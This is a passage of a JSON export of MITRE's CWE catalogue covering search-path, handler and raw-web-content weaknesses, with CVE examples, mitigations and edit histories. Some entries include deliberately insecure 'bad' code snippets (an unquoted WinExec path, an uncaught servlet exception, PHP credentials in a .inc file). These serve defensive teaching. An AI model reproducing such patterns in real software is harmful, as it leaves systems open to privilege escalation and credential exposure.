hijacking\\" issue in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3131"},{"Reference":"CVE-2010-1795","Description":"\\"DLL hijacking\\" issue in music player/organizer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1795"},{"Reference":"CVE-2002-1576","Description":"Product uses the current working directory to find and execute a program, which allows local users to gain privileges by creating a symlink that points to a malicious version of the program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576"},{"Reference":"CVE-1999-1461","Description":"Product trusts the PATH environmental variable to find and execute a program, which allows local users to obtain root access by modifying the PATH to point to a malicous version of that program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1461"},{"Reference":"CVE-1999-1318","Description":"Software uses a search path that includes the current working directory (.), which allows local users to gain privileges via malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1318"},{"Reference":"CVE-2003-0579","Description":"Admin software trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0579"},{"Reference":"CVE-2000-0854","Description":"When a document is opened, the directory of that document is first used to locate DLLs , which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854"},{"Reference":"CVE-2001-0943","Description":"Database trusts the PATH environment variable to find and execute programs, which allows local users to modify the PATH to point to malicious programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0943"},{"Reference":"CVE-2001-0942","Description":"Database uses an environment variable to find and execute a program, which allows local users to execute arbitrary programs by changing the environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0942"},{"Reference":"CVE-2001-0507","Description":"Server uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a malicious file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0507"},{"Reference":"CVE-2002-2017","Description":"Product allows local users to execute arbitrary code by setting an environment variable to reference a malicious program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2017"},{"Reference":"CVE-1999-0690","Description":"Product includes the current directory in root\'s PATH variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0690"},{"Reference":"CVE-2001-0912","Description":"Error during packaging causes product to include a hard-coded, non-standard directory in search path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0912"},{"Reference":"CVE-2001-0289","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0289"},{"Reference":"CVE-2005-1705","Description":"Product searches current working directory for configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1705"},{"Reference":"CVE-2005-1307","Description":"Product executable other program from current working directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1307"},{"Reference":"CVE-2002-2040","Description":"Untrusted path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2040"},{"Reference":"CVE-2005-2072","Description":"Modification of trusted environment variable leads to untrusted path vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072"},{"Reference":"CVE-2005-1632","Description":"Product searches /tmp for modules before other paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1632"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Uncontrolled Search Path Element"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"38"}},{"attr":{"@_CAPEC_ID":"471"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-409"}},{"attr":{"@_External_Reference_ID":"REF-410"}},{"attr":{"@_External_Reference_ID":"REF-411"}},{"attr":{"@_External_Reference_ID":"REF-412"}},{"attr":{"@_External_Reference_ID":"REF-413"}},{"attr":{"@_External_Reference_ID":"REF-414"}},{"attr":{"@_External_Reference_ID":"REF-415"}},{"attr":{"@_External_Reference_ID":"REF-416"}},{"attr":{"@_External_Reference_ID":"REF-417"}},{"attr":{"@_External_Reference_ID":"REF-1168"}},{"attr":{"@_External_Reference_ID":"REF-1169"}},{"attr":{"@_External_Reference_ID":"REF-1170"}}]},"Notes":{"Note":[{"#text":"Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control).","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model might need enhancement or clarification.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, References, Theoretical_Notes"}]}},"428":{"attr":{"@_ID":"428","@_Name":"Unquoted Search Path or Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.","Extended_Description":"If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as \\"C:\\\\Program.exe\\" to be run by a privileged program making use of WinExec.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"macOS","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly quote the full search path before executing a program on the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"UINT errCode = WinExec( \\"C:\\\\\\\\Program Files\\\\\\\\Foo\\\\\\\\Bar\\", SW_SHOW );"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1185","Description":"Small handful of others. Program doesn\'t quote the \\"C:\\\\Program Files\\\\\\" path when calling a program to be executed - or any other path with a directory or file whose name contains a space - so attacker can put a malicious program.exe into C:.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1185"},{"Reference":"CVE-2005-2938","Description":"CreateProcess() and CreateProcessAsUser() can be misused by applications to allow \\"program.exe\\" style attacks in C:","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2938"},{"Reference":"CVE-2000-1128","Description":"Applies to \\"Common Files\\" folder, with a malicious common.exe, instead of \\"Program Files\\"/program.exe.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1128"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unquoted Search Path or Element"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "Process Loading", Page 654"}}},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness could apply to any OS that supports spaces in filenames, especially any OS that make it easy for a user to insert spaces into filenames or folders, such as Windows. While spaces are technically supported in Unix, the practice is generally avoided. ."},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness primarily involves the lack of quoting, which is not explicitly stated as a part of CWE-116. CWE-116 also describes output in light of structured messages, but the generation of a filename or search path (as in this weakness) might not be considered a structured message.","An additional complication is the relationship to control spheres. Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere, this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control. This is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model needs enhancement or clarification."]},{"#text":"Under-studied, probably under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"430":{"attr":{"@_ID":"430","@_Name":"Deployment of Wrong Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The wrong \\"handler\\" is assigned to process an object.","Extended_Description":"An example of deploying the wrong handler would be calling a servlet to reveal source code of a .JSP file, or automatically \\"determining\\" type of the object even if it is contradictory to an explicitly specified type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This weakness is usually resultant from other weaknesses."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting an object."},{"Phase":"Architecture and Design","Description":"Reject any inconsistent types, such as a file with a .GIF extension that appears to consist of PHP code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0004","Description":"Source code disclosure via manipulated file extension that causes parsing by wrong DLL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0004"},{"Reference":"CVE-2002-0025","Description":"Web browser does not properly handle the Content-Type header field, causing a different application to process the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0025"},{"Reference":"CVE-2000-1052","Description":"Source code disclosure by directly invoking a servlet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1052"},{"Reference":"CVE-2002-1742","Description":"Arbitrary Perl functions can be loaded by calling a non-existent function that activates a handler.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1742"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Handler Deployment"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"11"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "File Handlers", Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improper Handler Deployment","attr":{"@_Date":"2008-04-11"}}}},"431":{"attr":{"@_ID":"431","@_Name":"Missing Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A handler is not available or implemented.","Extended_Description":"When an exception is thrown and not caught, the process has given up an opportunity to decide if a given failure or event is worth a change in execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle all possible situations (e.g. error condition)."},{"Phase":"Implementation","Description":"If an operation can throw an Exception, implement a handler for that specific exception."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If a Servlet does not catch all exceptions, it may reveal debugging information that will help an adversary form a plan of attack. In the following method a DNS lookup failure will cause the Servlet to throw an exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "File Handlers", Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"432":{"attr":{"@_ID":"432","@_Name":"Dangerous Signal Handler not Disabled During Sensitive Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running.","Extended_Description":"During the execution of a signal handler, it can be interrupted by another handler when a different signal is sent. If the two handlers share state - such as global variables - then an attacker can corrupt the state by sending another signal before the first handler has completed execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Turn off dangerous handlers when performing sensitive operations."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Dangerous handler not cleared/disabled during sensitive operations"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangerous Handler not Cleared/Disabled During Sensitive Operations","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangerous Handler not Disabled During Sensitive Operations","attr":{"@_Date":"2010-12-13"}}]}},"433":{"attr":{"@_ID":"433","@_Name":"Unparsed Raw Web Content Delivery","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.","Extended_Description":"If code is stored in a file with an extension such as \\".inc\\" or \\".pl\\", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"219","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting files."},{"Phase":"Architecture and Design","Description":"Do not store sensitive information in files which may be misinterpreted."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"<?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?>","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"<?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?>","xhtml:br":["","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1886","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1886"},{"Reference":"CVE-2002-2065","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2065"},{"Reference":"CVE-2005-2029","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2029"},{"Reference":"CVE-2001-0330","Description":"direct request to .pl file leaves it unparsed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330"},{"Reference":"CVE-2002-0614","Description":".inc file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0614"},{"Reference":"CVE-2004-2353","Description":"unparsed config.conf file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2353"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unparsed Raw Web Content Delivery"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "File Handlers", Page 74"}}},"Notes":{"Note":{"#text":"This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content 